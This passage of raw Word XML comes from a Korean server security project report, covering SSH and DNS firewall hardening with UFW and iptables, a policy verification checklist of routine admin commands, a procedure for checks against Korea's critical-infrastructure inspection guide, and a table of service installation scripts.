            </w:r>
          </w:p>
        </w:tc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TERM-5-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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계정/접근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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관리망만 SSH 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서버(UFW)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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>allow from &lt;관리망&gt; / deny 22</w:t>
            </w:r>
          </w:p>
        </w:tc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TERM-5-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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네트워크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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH 스캔/브루트포스 자동 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서버(iptables)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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>recent 모듈 기반 율제한</w:t>
            </w:r>
          </w:p>
        </w:tc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TERM-5-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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DNS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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>AXFR 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서버(UFW/iptables/DNS 설정)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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TCP 53 제한, allow-transfer 통제</w:t>
            </w:r>
          </w:p>
        </w:tc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LOG-5-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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웹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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>정찰 차단(내부 전용 시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서버(iptables/UFW)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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>80/443 접근대역 제한</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>(선택)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TERM-5-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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관제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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>로그 수집 기준 수립</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>운영절차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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>access/auth/syslog/kern 로그 제출</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>완료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표 5-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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관제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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>시나리오별 판별 기준 수립</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관제 운영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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark 필터/로그 패턴 정의</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>완료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표 5-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-13. iptables recent 옵션 의미(요약)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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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옵션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의미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--dport 22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SSH 포트 접근 대상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--state NEW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새 연결 시도에 한정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-m recent --set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접속 기록을 메모리에 저장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--name SSH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기록 이름(그룹)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--seconds 60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최근 60초 기준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--hitcount 5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5회 이상 시 차단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--rttl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동일 TTL 조건(위장 스캔 방지 보조)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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-j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7370" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>조건 만족 시 패킷 폐기</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-14. 정책 검증 체크리스트(편집용)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w="2721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점검 항목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명령/방법</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041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기대 결과</w:t>
            </w:r>
          </w:p>
        </w:tc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결과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증빙 ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSHD 설정 반영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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>sshd -T | egrep 'permitrootlogin|passwordauthentication'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>no / no</w:t>
            </w:r>
          </w:p>
        </w:tc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TERM-5-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>UFW 규칙 적용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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ufw status verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>22/tcp 제한 규칙 확인</w:t>
            </w:r>
          </w:p>
        </w:tc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TERM-5-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>iptables 규칙 적용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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>iptables -S | egrep 'recent|dport 22'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>recent 규칙 존재</w:t>
            </w:r>
          </w:p>
        </w:tc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TERM-5-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DNS TCP 53 차단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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ss -lntup | grep ':53' + 방화벽 규칙 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>정책 의도대로 제한</w:t>
            </w:r>
          </w:p>
        </w:tc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TERM-5-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>웹 접근 통제(선택)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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>curl/브라우저 접근 테스트</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>비허용 대역 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="907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TERM-5-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-8. 보안 정책 적용 전/후 검증 캡처(증빙)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: IMG-5-08</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>점검 체크리스트 결과(터미널/로그/관제 화면) 캡처를 항목별로 삽입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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>5.4 주정통 기반 보안점검 결과</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>주정통(주요정보통신기반시설) 기술적 점검 가이드 기반으로 선별한 점검 항목을 대상으로 자동화 점검(스크립트)과 수동 점검(로그/설정 확인)을 병행하여 결과를 정리하였다. 점검 항목/코드 체계는 프로젝트에서 선정한 기준에 맞춰 수정 가능하도록 표 형태로 구성하였다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-15. 주정통 기반 점검 수행 절차(요약)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3213"/>
        <w:gridCol w:w="3213"/>
        <w:gridCol w:w="3213"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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단계</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6123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내용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산출물</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r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6123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>점검 대상 서버 목록(DB) 등록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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>자산 목록</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>점검 항목(선정) 정의 및 자동화/수동 분류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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>점검 항목표</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH 기반 점검 명령 수행 및 결과 파싱/저장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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>점검 결과(DB/리포트)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>결과 가시화(웹 페이지/대시보드)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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>대시보드 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>미흡 항목 조치 후 재점검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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>조치 내역 및 재점검 결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-16. 자동화 스크립트/함수(요약, 참고: 기획안 주정통 코드 부분)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w="567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NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928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스크립트/함수</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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대상 서버/OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948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주요 기능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입력 예시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출력/결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r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928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>init_ssh + menu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Ubuntu/Rocky9(Core)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DHCP/Apache/VHost/PHP/phpMyAdmin/FTP/MariaDB 설치 선택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IP:172.16.16.1, [1-3]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서비스 활성 + index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>apa_in(), apa_ch_dir_in()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Rocky9(Web EN/KR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Apache + VirtualHost(team1.com) + DocRoot 변경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/home/team1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httpd.conf 수정 + 재시작</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>smb_install(), go()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Rocky9(Storage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Samba 설치/공유 + user 생성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PW: (마스킹)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smbd/nmbd active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>install_and_configure(), main()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Ubuntu(MB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TigerVNC + GNOME + xstartup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PW: (마스킹), :5901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vncserver@:1 active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>nfs_install(), main()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Rocky9(Storage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>NFS utils + 공유 + 마운트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NFS IP:172.16.16.100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exportfs -v 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>download(), main()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Rocky9(MB-Monitorix)</w:t>
            </w:r>
